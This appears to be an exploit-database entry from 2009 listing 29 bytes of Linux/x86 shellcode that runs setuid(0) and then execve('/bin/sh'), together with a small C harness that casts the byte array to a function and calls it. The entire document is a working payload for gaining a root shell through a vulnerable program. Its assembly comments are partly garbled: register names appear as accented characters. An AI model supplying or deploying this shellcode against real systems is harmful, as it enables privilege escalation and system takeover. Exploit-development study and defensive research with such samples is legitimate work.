Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)
2009-01-01 12:05:09
/* 29 byte-long setuid(0) + execve("/bin/sh",...) shellcode
by Marcin Ulikowski <[email protected]> */
#include <unistd.h>
char shellcode[] =
"\x31\xdb" /* xor ëx,ëx */
"\x8d\x43\x17" /* lea 0x17(ëx),êx */
"\xcd\x80" /* int $0x80 */
"\x53" /* push ëx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,ëx */
"\x50" /* push êx */
"\x53" /* push ëx */
"\x89\xe1" /* mov %esp,ìx */
"\x99" /* cltd */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */
/*
 * Test harness: reinterprets the address of the shellcode array as a
 * pointer to a function with no declared parameters and calls it.
 *
 * The array is an ordinary initialised, writable global. Where data pages
 * are mapped non-executable (NX / W^X), this call is expected to fault
 * instead of running the bytes; verify against the target build's
 * memory-protection settings.
 *
 * Returns 0 only if control comes back from the call.
 */
int main(void)
{
    void (*entry)() = (void *)shellcode;

    entry();
    return 0;
}

